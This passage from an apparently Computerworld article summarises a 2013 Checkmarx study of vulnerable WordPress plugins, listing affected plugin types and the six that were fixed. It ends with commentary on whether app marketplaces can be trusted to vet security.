4. Vulnerable top 50 general plugin types vary. These include, but are not limited to, plugins used for:
- Ecommerce, such as a shopping cart
- Content management, such as feed aggregators, related links and checking of broken links
- Site development, such as APIs for web development and transforming a website to a mobile app
- Social networks - from linking to Facebook to establishing an internal organization network.
5. Only six plugins were completely fixed in a six-month time period - although all plugins updated their versions during this time. A first scan ran in January 2013 showed a higher rate of vulnerable plugins where more than a third (18 out of 50) of the plugins were vulnerable. In total, this meant that nearly 18.5 million vulnerable plugins were downloaded. Vulnerabilities in that first scan also presented the existence of RFI/ LFI vulnerabilities. The second scan, conducted in early June 2013, was performed on the updated versions of all plugins. However, only six of these updates were free of those previously found vulnerabilities. These were:
- BuddyPress - creates a social network for the organization. Downloads: 1,319,743. Alerted by Checkmarx to their vulnerabilities.
- BBPress - forum software. Downloads: 483,283. Alerted by Checkmarx to their vulnerabilities.
- E-Commerce - shopping cart plugin. Downloads: 2,209,352. Alerted by Checkmarx to their vulnerabilities.
- Woo Commerce - an ecommerce store. Downloads: 469,503. Alerted by Checkmarx to their vulnerabilities.
- W3 Total Cache - site optimization by caching. Downloads: 1,450,980. Most likely fixed as part of a security overhaul following an external full disclosure of some vulnerabilities.
- Super Cache - site optimization by caching. Downloads: 3,984,976. Most likely fixed as part of a security overhaul as with W3 Total Cache.
To me this is the same type of thing we see in the Google Play store and other online marketplaces. The app or plugin feature is a great way to add functionality and features to everything from phones and tablets to your cloud instance and your website, but do you trust the downloads from your marketplace?
The marketplace or app store has become a feature in so many places today. As consumers in these marketplaces, we tend to think that just because something has been approved for an app store or marketplace it must be safe. This report by Checkmarx shows once again that it isn't necessarily true. What should the expectations of security be for applications, plugins or programs you use from a marketplace?
To give Apple its due, one of the strengths of the iTunes App Store is that for the most part, apps that are approved have been checked for security risks. Google has recently done a better job of checking for security. But there are so many third-party marketplaces. Amazon and Rackspace's cloud marketplace, for instance, or the WordPress plugins for another.
Sign up for Computerworld eNewsletters.